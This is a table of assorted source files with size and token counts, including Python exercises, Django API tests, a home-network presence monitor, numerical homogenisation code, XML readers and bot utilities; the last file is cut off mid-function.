text string | size int64 | token_count int64 |
|---|---|---|
name = input('Enter you name :')
print('Hello ',name) | 54 | 18 |
"""
Exercise 2
Write a program to prompt for a file name, and then read through the file and
look for lines of the form:
X-DSPAM-Confidence: 0.8475
When you encounter a line that starts with 'X-DSPAM-Confidence:' pull apart
the line to extract the floating point number on the line. Count these lines
and the compute the total of the spam confidence values from these lines. When
you reach the end of the file, print out the average spam confidence.
Enter the file name: mbox.txt
Average spam confidence: 0.894128046745
Enter the file name: mbox-short.txt
Average spam confidence: 0.750718518519
Test your file on the mbox.txt and mbox-short.txt files.
"""
file_name = input("Enter a file name: ")
lines = [line for line in open(file_name, "r")]
confidence_sum = 0
confidence_count = 0
for line in lines:
if line.find("X-DSPAM-Confidence") == -1:
pass
else:
confidence_index = line.find(" ") + 1
confidence = float(line[confidence_index:])
confidence_sum += confidence
confidence_count += 1
print("Average spam confidence: ", (confidence_sum / confidence_count))
| 1,116 | 356 |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 21 13:00:28 2021
@author: OTPS
"""
import matplotlib.pyplot as plt
import numpy as np
from scipy.ndimage.filters import gaussian_filter
from PIL import Image
img1 = Image.open(r"fit to merge.png", mode='r')
img2 = Image.open(r"base to merge.png")
img1.paste(img2, (0,0), mask = img2)
img1.show() | 353 | 153 |
from intake import models
from rest_framework import serializers
from . import fields
class IncomingTransferSerializer(serializers.ModelSerializer):
organization_name = serializers.SerializerMethodField()
author_name = serializers.SerializerMethodField()
local_date = serializers.SerializerMethodField()
to_organization_name = serializers.SerializerMethodField()
class Meta:
model = models.ApplicationTransfer
fields = [
'to_organization_name',
'organization_name',
'author_name',
'local_date',
'reason'
]
def get_to_organization_name(self, instance):
return instance.new_application.organization.name
def get_organization_name(self, instance):
return instance.status_update.application.organization.name
def get_author_name(self, instance):
return instance.status_update.author.profile.name
def get_local_date(self, instance):
return fields.LocalDateField().to_representation(
instance.status_update.created)
| 1,081 | 277 |
a, b, k = map(int, input().split())
mx = max(a, b)
match, ans = 0, 0
for i in range(mx):
if ((a % (mx - i)) == 0) and ((b % (mx - i)) == 0):
match += 1
ans = mx - i
if match == k:
break
print(ans)
| 256 | 105 |
from server.handlers.base import ListResource
from server.models import Issue
class IssueListResource(ListResource):
@property
def resource(self):
return Issue
@property
def key(self):
return "issues"
| 237 | 64 |
"""
None Player Characters
Player Characters are (by default) Objects setup to be puppeted by Players.
They are what you "see" in game. The Character class in this module
is setup to be the "default" character type created by the default
creation commands.
"""
from muddery.server.mappings.element_set import ELEMENT
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
class MudderyWorldNPC(ELEMENT("BASE_NPC")):
"""
The character not controlled by players.
"""
element_type = "WORLD_NPC"
element_name = _("World NPC", "elements")
model_name = "world_npcs"
def after_element_setup(self, first_time):
"""
Init the character.
"""
super(MudderyWorldNPC, self).after_element_setup(first_time)
if not self.is_temp:
# if it is dead, reborn at init.
if not self.is_alive() and self.reborn_time > 0:
self.reborn()
def is_visible(self, caller):
"""
If this object is visible to the caller.
Return:
boolean: visible
"""
if not self.const.condition:
return True
return STATEMENT_HANDLER.match_condition(self.const.condition, caller, self)
| 1,305 | 393 |
import json
from .base import BaseTestArticles
from rest_framework.views import status
from ..models import Article
from ...authentication.models import User
from ....apps.profiles.models import Profile
class TestArticles(BaseTestArticles):
def data3_user_jwt(self):
return User.objects.create_user(**self.data3['user']).token()
def super_user_jwt(self):
user = User.objects.create_superuser(**self.data3['user'])
return user.token()
def test_create_models_article(self):
user = User.objects.create_user(
username='henry', email='henry@gmail.com',
password='Pass12')
user.is_verified = True
user = User.objects.filter(email='henry@gmail.com').first()
author = Profile.objects.get(user_id=user.id)
article = Article.objects.create(
title='article title', author=author)
self.assertEqual(str(article), article.title)
def create_article(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/', data=self.article, format='json')
return response.data['slug']
def test_create_article(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/', data=self.article, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_article_long_title(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/', data=self.article_log_tile, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_get_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.get(
'/api/articles/'+slug+'', format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_article_doesnot_exist(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
fake_slug = "ed"*23
response = self.client.get(
'/api/articles/{}'.format(fake_slug), format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.delete(
'/api/articles/'+slug+'/', format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_article_doesnot_exist(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
fake_slug = "ed"*23
response = self.client.delete(
'/api/articles/{}/'.format(fake_slug), format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_non_existing_article(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
fake_slug = "ed"*23
response = self.client.put(
'/api/articles/ffhfh-ggrg/', data=self.updated_article, format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_update_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.put(
'/api/articles/'+slug+'/', data=self.updated_article, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_get_no_existing_published_articles(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.get(
'/api/articles', format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_get_all_published_articles(self):
self.create_article()
self.create_article()
self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.get(
'/api/articles', format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_all_tags(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
self.client.post(
'/api/articles/', data=self.article, format='json')
slug = self.create_article()
response = self.client.get(
'/api/{}/tags/'.format(slug, format='json')
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['tags'], ['Rails', 'Golang', 'magic!'])
def test_delete_tag(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
self.client.post(
'/api/articles/', data=self.article, format='json')
slug = self.create_article()
response = self.client.delete(
'/api/{}/tags/magic!/'.format(slug, format='json')
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_article_not_author(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/', data=self.article, format='json')
response = json.loads(response.content)
slug = response['article']['slug']
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.data3_user_jwt())
res = self.client.delete(
'/api/articles/{}/'.format(slug))
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
json.loads(res.content)['article']['error'],
'You can only delete your own articles'
)
def test_report_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/{}/report/'.format(slug),
data=self.report_article_data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
json.loads(response.content)['reported']['reason'],
'article contains porn'
)
def test_report_article_doesnot_exist(self):
slug = 'fake-slug'
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/{}/report/'.format(slug),
data=self.report_article_data, format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(response.content)['errors'],
'This article doesnot exist'
)
def test_report_article_no_data(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/{}/report/'.format(slug), data={}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(response.content)['errors'],
'Provide reason for reporting'
)
def test_report_article_empty_reason(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.post(
'/api/articles/{}/report/'.format(slug),
self.report_article_data_empty_reason, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(response.content)['errors']['reason'],
['This field may not be blank.']
)
def test_report_article_more_than_5_times(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
for article in range(6):
self.client.post(
'/api/articles/{}/report/'.format(slug),
data=self.report_article_data, format='json')
response = self.client.post(
'/api/articles/{}/report/'.format(slug),
data=self.report_article_data, format='json')
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
self.assertEqual(
json.loads(response.content)['errors'],
'This article has been reported more than 5 times'
)
def test_fetch_all_reported_articles_non_superuser(self):
self.create_article()
self.create_article()
self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.get('/api/reported/', format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(
json.loads(response.content)['reported']['detail'],
'You do not have permission to perform this action.'
)
def test_fetch_all_reported_articles_superuser(self):
slug1 = self.create_article()
slug2 = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
self.client.post(
'/api/articles/{}/report/'.format(slug1),
data=self.report_article_data, format='json')
self.client.post(
'/api/articles/{}/report/'.format(slug2),
data=self.report_article_data, format='json')
response = self.client.get('/api/reported/', format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn(
slug2,
json.loads(response.content)[
'reported']['articles'][0]['article_slug'],
)
def test_fetch_all_reported_articles_that_dont_exist(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
response = self.client.get('/api/reported/', format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(response.content)['reported']['articles']['message'],
'There are no reported articles'
)
def test_revert_reported_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
self.client.post(
'/api/articles/{}/report/'.format(slug), format='json')
self.client.post(
'/api/articles/{}/report/'.format(slug), format='json')
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
response = self.client.put(
'/api/reported/{}/revert/'.format(slug), format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['reported']['message'],
'article restored successully'
)
def test_revert_reported_article_doesnot_exist(self):
slug = 'fake_slug'
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
response = self.client.put(
'/api/reported/{}/revert/'.format(slug), format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_reported_article(self):
slug = self.create_article()
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
self.client.post(
'/api/articles/{}/report/'.format(slug), format='json')
self.client.post(
'/api/articles/{}/report/'.format(slug), format='json')
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
response = self.client.delete(
'/api/reported/{}/delete/'.format(slug), format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['reported']['message'],
'article was deleted successully'
)
def test_delete_reported_article_doesnot_exist(self):
self.create_article()
slug = 'fakeslug'
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
response = self.client.delete(
'/api/reported/{}/delete/'.format(slug), format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
response.data['reported']['error'],
'This article doesnot exist'
)
def test_articles_pagination(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
self.client.post(
'/api/articles/', data=self.article, format='json')
self.client.post(
'/api/articles/', data=self.article, format='json')
response = self.client.get(
'/api/articles?page=1&limit=1',format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_page_doesnot_exist(self):
self.client.credentials(
HTTP_AUTHORIZATION='Bearer ' + self.login_user())
response = self.client.get(
'/api/articles?page=5',format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 14,149 | 4,304 |
'''
@author: davandev
'''
import logging
import os
import urllib
import datetime
from threading import Thread,Event
import davan.config.config_creator as configuration
import davan.http.service.presence.url_helper as url_util
import davan.util.constants as constants
import davan.util.cmd_executor as cmd_executor
import time
import telnetlib
from davan.http.service.presence.phone_status import PhoneStatus
from davan.http.service.base_service import BaseService
'''
Enable telnet in asus router
log into router with user + passwd
run cmd: "/usr/sbin/ip neigh" or /usr/sbin/ip neigh | grep REACHABLE
list shows online devices
'''
class PresenceMgrService(BaseService):
'''
classdocs
'''
def __init__(self, service_provider, config ):
'''
Constructor
'''
BaseService.__init__(self, constants.PRESENCE_SERVICE_NAME, service_provider, config)
self.logger = logging.getLogger(os.path.basename(__file__))
self.hping_cmd = ['sudo','/usr/sbin/hping3', '-2', '-c', '10', '-p', '5353', '-i' ,'u1','','-q']
self.devices_cmd =['sudo','/usr/sbin/arp', '-an']#, | awk '{print $4} '"]
self.delete_device_cmd =['sudo','/usr/sbin/arp', '-i' ,'eth0', '-d', '']
self.monitored_devices = []
# wilma = PhoneStatus("wilma","04:F1:3E:5C:79:75","192.168.2.11", iphone=True)
# self.monitored_devices.append(wilma)
david = PhoneStatus("david","7c:91:22:2c:98:c8","192.168.2.39",iphone=False)
self.monitored_devices.append(david)
# viggo = PhoneStatus("viggo","40:40:A7:27:2C:98","192.168.2.233",iphone=True)
# self.monitored_devices.append(viggo)
mia = PhoneStatus("mia","E8:50:8B:F5:C8:8A","192.168.2.86",iphone=True)
self.monitored_devices.append(mia)
self.event = Event()
def handle_request(self, msg):
msg = msg.split('?')
res = msg[1].split('=')
self.monitor_user(res[1])
return 200, ""
def stop_service(self):
self.logger.debug("Stopping service")
self.event.set()
def start_service(self):
'''
Start a timer that will pop repeatedly.
@interval time in seconds between timeouts
@func callback function at timeout.
'''
self.logger.info("Starting re-occuring event")
def loop():
while not self.event.wait(300): # the first call is in `interval` secs
self.increment_invoked()
self.timeout()
Thread(target=loop).start()
return self.event.set
def monitor_user(self, user_name):
'''
Starts monitoring user presence
@param user, the user to monitor
'''
now = datetime.datetime.now()
expire_time = now + datetime.timedelta(minutes = 7)
self.logger.info("Got new user to monitor [" + user_name + "] New expire time:" +str(expire_time))
for user in self.monitored_devices:
if user.user == user_name:
user.expire_time = expire_time
def check_router_status(self):
self.logger.info("Check router status")
HOST = "192.168.2.1"
# user = raw_input("Enter your remote account: ")
# password = getpass.getpass()
tn = telnetlib.Telnet(HOST)
tn.read_until("login: ")
tn.write("admin\n")
tn.read_until("Password: ")
tn.write("\n")
tn.write("/usr/sbin/ip neigh | grep REACHABLE\n")
tn.write("exit\n")
print tn.read_all()
def timeout(self):
for user in self.monitored_devices:
user.status_changed = False
previous_state = user.phone_status
self.logger.info("Check presence for user: [ "+ user.user +" ] Previous state [ " + str(previous_state)+ " ]")
self.is_phone_on_wifi(user)
self.is_phone_reporting(user)
if (user.wifi_status or
user.reporting_status):
if (not previous_state):
user.phone_status = True
user.status_changed = True
home_url = url_util.getUserHomeUrl(self.config, user.user)
urllib.urlopen(home_url)
elif (not user.reporting_status and
not user.wifi_status):
if previous_state:
user.phone_status = False
user.status_changed = True
away_url = url_util.getUserAwayUrl(self.config, user.user)
urllib.urlopen(away_url)
user.toString()
self.logger.info("-------------------------------------------------")
def is_phone_on_wifi(self,user):
self.hping_cmd[9] = user.ip_adress
cmd_executor.execute_block(self.hping_cmd, "hping", True)
time.sleep(3)
result = cmd_executor.execute_block(self.devices_cmd, "devices", True)
if user.mac_adress in result:
if user.wifi_status:
user.wifi_last_active = str(datetime.datetime.now())
else:
user.set_wifi_status(True)
user.wifi_first_active = str(datetime.datetime.now())
if user.has_iphone: #Special case for Iphone monitored_devices,
now = datetime.datetime.now()
expire_time = now + datetime.timedelta(minutes = 60)
self.logger.info("User["+user.user+"] has iphone increase expire time to "+ str(expire_time) + " Current time:" + str(now))
user.expire_time = expire_time
self.delete_device_cmd[5] = user.ip_adress
cmd_executor.execute_block(self.delete_device_cmd, "delete_device", True)
cmd_executor.execute_block(self.hping_cmd, "hping", True)
else:
if user.wifi_status:
user.set_wifi_status(False)
def is_phone_reporting(self, user):
'''
Timeout received, check if any user is now away,
then inform fibaro system about it.
'''
current_time = datetime.datetime.now()
if user.expire_time > current_time:
if user.reporting_status:
user.reporting_last_active = str(current_time)
else:
user.set_reporting_status(True)
user.reporting_first_active = str(current_time)
else:
if user.reporting_status:
user.set_reporting_status(False)
if __name__ == '__main__':
from davan.util import application_logger as log_config
config = configuration.create()
log_config.start_logging(config['LOGFILE_PATH'],loglevel=3)
test = PresenceMgrService(config)
test.check_router_status()
| 7,135 | 2,304 |
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
def test_glm_plot():
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
Y = 3
X = [0, 1, 2, 4, 5, 6, 7, 8, 9, 10]
model = H2OGeneralizedLinearEstimator(family="binomial", alpha=0, Lambda=1e-5)
model.train(x=X, y=Y, training_frame=training_data)
model.plot(metric="objective", server=True) # make sure graph will not show.
try:
model.plot(metric="auc")
sys.exit(1) # should have invoked an error
except:
sys.exit(0) # no problem
if __name__ == "__main__":
pyunit_utils.standalone_test(test_glm_plot)
else:
test_glm_plot()
| 815 | 314 |
from __future__ import division, print_function
print("""
Numerical homogenisation based on exact integration, which is described in
J. Vondrejc, Improved guaranteed computable bounds on homogenized properties
of periodic media by FourierGalerkin method with exact integration,
Int. J. Numer. Methods Eng., 2016.
This is a self-contained tutorial implementing scalar problem in dim=2 or dim=3
on a unit periodic cell Y=(-0.5,0.5)**dim
with a square (2D) or cube (3D) inclusion of size 0.6 (side).
The material is identity I in matrix phase and 11*I in inclusion phase.
""")
import numpy as np
import itertools
from scipy.sparse.linalg import cg, LinearOperator
dim = 3 # number of spatial dimensions
N = dim*(5,) # number of discretization points
dN = tuple(2*np.array(N)-1) # double grid value
vec_shape=(dim,)+dN
# indicator function indicating the phase per grid point (square inclusion)
P = dim*(5,) # material resolution in each spatial dimension
phi = np.zeros(P, dtype='float')
if dim==2:
phi[1:4, 1:4] = 1
elif dim==3:
phi[1:4, 1:4, 1:4] = 1
# material coefficients at grid points
C = np.einsum('ij,...->ij...', 11*np.eye(dim), phi)
C += np.einsum('ij,...->ij...', 1*np.eye(dim), 1-phi)
# tensor products / (inverse) Fourier transform / frequencies
dot = lambda A, B: np.einsum('ij...,j...->i...', A, B)
fft = lambda x, N: np.fft.fftshift(np.fft.fftn(np.fft.ifftshift(x), N))/np.prod(np.array(N))
ifft = lambda x, N: np.fft.fftshift(np.fft.ifftn(np.fft.ifftshift(x), N))*np.prod(np.array(N))
freq_fun = lambda N: np.arange(np.fix(-N/2.), np.fix(N/2.+0.5))
freq = [freq_fun(n) for n in dN]
def get_weights(h): # calculation of integral weights of rectangular function
Wphi = np.zeros(dN) # integral weights
for ind in itertools.product(*[range(n) for n in dN]):
Wphi[ind] = np.prod(h)
for ii in range(dim):
Wphi[ind] *= np.sinc(h[ii]*freq[ii][ind[ii]])
return Wphi
def decrease(val, dN): # auxiliary function to remove unnecesary Fourier freq.
dN=np.array(dN)
N=np.array(val.shape[-dN.size:])
ibeg = np.array(np.fix((N-dN+(dN % 2))/2), dtype=np.int)
iend = np.array(np.fix((N+dN+(dN % 2))/2), dtype=np.int)
if dN.size==2:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1]]
elif dN.size==3:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1],ibeg[2]:iend[2]]
## GRID-BASED COMPOSITE ######### evaluate the matrix of Galerkin approximation
hC0 = np.prod(np.array(P))*fft(C, P)
if P == dN:
hCex = hC0
elif P > dN:
hCex = decrease(hC0, dN)
elif P < dN:
factor = np.max(np.ceil(np.array(dN) / np.array(P)))
hCper = np.tile(hC0, int(2*factor-1)*np.ones(dim, dtype=np.int))
hCex = decrease(hCper, dN)
Cex = ifft(np.einsum('ij...,...->ij...', hCex, get_weights(1./np.array(P))), dN).real
## INCLUSION-BASED COMPOSITE #### another expression of Cex
Wraw = get_weights(0.6*np.ones(dim))
"""HINT: the size 0.6 corresponds to the size of square inclusion; it is exactly
the size of topology generated by phi, i.e. 3x3 pixels in 5x5 image of PUC with
PUC size 1; then 0.6 = 3./5.
"""
char_square = ifft(Wraw, dN).real
Cex2 = np.einsum('ij...,...->ij...', 11*np.eye(dim), char_square)
Cex2 += np.einsum('ij...,...->ij...', 1*np.eye(dim), 1.-char_square)
## checking that the Cex2 is the same
print('zero check:', np.linalg.norm(Cex-Cex2))
Gamma = np.zeros((dim,dim)+ tuple(dN)) # zero initialize
for i,j in itertools.product(range(dim),repeat=2):
for ind in itertools.product(*[range(int((dN[k]-N[k])/2), int((dN[k]-N[k])/2+N[k])) for k in range(dim)]):
q = np.array([freq[ii][ind[ii]] for ii in range(dim)]) # frequency vector
if not q.dot(q) == 0: # zero freq. -> mean
Gamma[(i,j)+ind] = -(q[i]*q[j])/(q.dot(q))
# - convert to operators
G = lambda X: np.real(ifft(dot(Gamma, fft(X, dN)), dN)).reshape(-1)
A = lambda x: dot(Cex, x.reshape(vec_shape))
GA = lambda x: G(A(x))
# initiate strain/stress (2nd order tensor for each grid point)
X = np.zeros(vec_shape, dtype=np.float)
x = X.reshape(-1)
# macroscopic value
E = np.zeros_like(X); E[0] = 1.
b = -GA(E.reshape(-1))
# iterative solution of the linear system
Alinoper = LinearOperator(shape=(x.size, x.size), matvec=GA, dtype=np.float)
x, info = cg(A=Alinoper, b=b, x0=X.reshape(-1)) # conjugate gradients
state = x.reshape(vec_shape) + E
flux = dot(Cex, state)
AH_11 = np.sum(flux*state)/np.prod(np.array(dN)) # homogenised properties
print('homogenised coefficient (component 11) =', AH_11)
print('END')
| 4,521 | 1,865 |
import sys
import lxml.etree
from bonobo.constants import NOT_MODIFIED
from bonobo.nodes.io.file import FileReader
from bonobo.config import Configurable, Option, Service
class XMLReader(FileReader):
'''
A FileReader that parses an XML file and yields lxml.etree Element objects matching
the given XPath expression.
'''
xpath = Option(str, required=True)
def read(self, file):
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
yield e
__call__ = read
class CurriedXMLReader(Configurable):
'''
Similar to XMLReader, this reader takes XML filenames as input, and for each parses
the XML content and yields lxml.etree Element objects matching the given XPath
expression.
'''
xpath = Option(str, required=True)
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
mode = Option(
str,
default='r',
__doc__='''What mode to use for open() call.''',
) # type: str
encoding = Option(
str,
default='utf-8',
__doc__='''Encoding.''',
) # type: str
limit = Option(
int,
__doc__='''Limit the number of rows read (to allow early pipeline termination).''',
)
verbose = Option(
bool,
default=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.count = 0
def read(self, path, *, fs):
limit = self.limit
count = self.count
if not(limit) or (limit and count < limit):
if self.verbose:
sys.stderr.write('============================== %s\n' % (path,))
file = fs.open(path, self.mode, encoding=self.encoding)
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
if limit and count >= limit:
break
count += 1
yield e
self.count = count
file.close()
__call__ = read
class ExtractXPath(Configurable):
xpath = Option(str, required=True)
def __call__(self, e):
for a in e.xpath(self.xpath):
yield a
class FilterXPathEqual(Configurable):
xpath = Option(str, required=True)
value = Option(str)
def __call__(self, e):
for t in e.xpath(self.xpath):
if t.text == self.value:
return NOT_MODIFIED
return None
def print_xml_element(e):
s = lxml.etree.tostring(e).decode('utf-8')
print(s.replace('\n', ' '))
return NOT_MODIFIED
def print_xml_element_text(e):
print(e.text)
return NOT_MODIFIED
| 2,289 | 881 |
#
# Copyright (C) 2021-2022 by TeamYukki@Github, < https://github.com/TeamYukki >.
#
# This file is part of < https://github.com/TeamYukki/YukkiMusicBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamYukki/YukkiMusicBot/blob/master/LICENSE >
#
# All rights reserved.
from typing import Union
from pyrogram.types import Message
def get_readable_time(seconds: int) -> str:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for i in range(len(time_list)):
time_list[i] = str(time_list[i]) + time_suffix_list[i]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
def convert_bytes(size: float) -> str:
"""humanize size"""
if not size:
return ""
power = 1024
t_n = 0
power_dict = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
t_n += 1
return "{:.2f} {}B".format(size, power_dict[t_n])
async def int_to_alpha(user_id: int) -> str:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
text = ""
user_id = str(user_id)
for i in user_id:
text += alphabet[int(i)]
return text
async def alpha_to_int(user_id_alphabet: str) -> int:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
user_id = ""
for i in user_id_alphabet:
index = alphabet.index(i)
user_id += str(index)
user_id = int(user_id)
return user_id
def time_to_seconds(time):
stringt = str(time)
return sum(
int(x) * 60**i
for i, x in enumerate(reversed(stringt.split(":")))
)
def seconds_to_min(seconds):
if seconds is not None:
seconds = int(seconds)
d, h, m, s = (
seconds // (3600 * 24),
seconds // 3600 % 24,
seconds % 3600 // 60,
seconds % 3600 % 60,
)
if d > 0:
return "{:02d}:{:02d}:{:02d}:{:02d}".format(d, h, m, s)
elif h > 0:
return "{:02d}:{:02d}:{:02d}".format(h, m, s)
elif m > 0:
return "{:02d}:{:02d}".format(m, s)
elif s > 0:
return "00:{:02d}".format(s)
return "-"
formats = [
"webm",
"mkv",
"flv",
"vob",
"ogv",
"ogg",
"rrc",
"gifv",
"mng",
"mov",
"avi",
"qt",
"wmv",
"yuv",
"rm",
"asf",
"amv",
"mp4",
"m4p",
"m4v",
"mpg",
"mp2",
"mpeg",
"mpe",
"mpv",
"m4v",
"svi",
"3gp",
"3g2",
"mxf",
"roq",
"nsv",
"flv",
"f4v",
"f4p",
"f4a",
"f4b",
]
| 3,063 | 1,270 |
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1TypedLocalObjectReferenceDict generated type."""
from typing import TypedDict
V1TypedLocalObjectReferenceDict = TypedDict(
"V1TypedLocalObjectReferenceDict",
{
"apiGroup": str,
"kind": str,
"name": str,
},
total=False,
)
| 316 | 101 |
from .context import GlobalContext
from .dao import BaseDao
from .model import BaseModel
from .service import BaseService
from .schema import BaseSchema, DeleteSchema, DeleteResponseSchema, ListSchema
from .crud import BaseCrud
from .message_generator import get_message
| 271 | 67 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from karbor.common import karbor_keystone_plugin
LOG = logging.getLogger(__name__)
class UserTrustManager(object):
def __init__(self):
super(UserTrustManager, self).__init__()
self._user_trust_map = {}
self._skp = karbor_keystone_plugin.KarborKeystonePlugin()
def _user_trust_key(self, user_id, project_id):
return "%s_%s" % (user_id, project_id)
def _add_user_trust_info(self, user_id, project_id,
operation_id, trust_id, session):
key = self._user_trust_key(user_id, project_id)
self._user_trust_map[key] = {
'operation_ids': {operation_id},
'trust_id': trust_id,
'session': session
}
def _get_user_trust_info(self, user_id, project_id):
return self._user_trust_map.get(
self._user_trust_key(user_id, project_id))
def _del_user_trust_info(self, user_id, project_id):
key = self._user_trust_key(user_id, project_id)
del self._user_trust_map[key]
def get_token(self, user_id, project_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if not auth_info:
return None
try:
return auth_info['session'].get_token()
except Exception:
LOG.exception("Get token failed, user_id=%(user_id)s, "
"project_id=%(proj_id)s",
{'user_id': user_id, 'proj_id': project_id})
return None
def add_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return auth_info['trust_id']
trust_id = self._skp.create_trust_to_karbor(context)
try:
lsession = self._skp.create_trust_session(trust_id)
except Exception:
self._skp.delete_trust_to_karbor(trust_id)
raise
self._add_user_trust_info(context.user_id, context.project_id,
operation_id, trust_id, lsession)
return trust_id
def delete_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if not auth_info:
return
operation_ids = auth_info['operation_ids']
operation_ids.discard(operation_id)
if len(operation_ids) == 0:
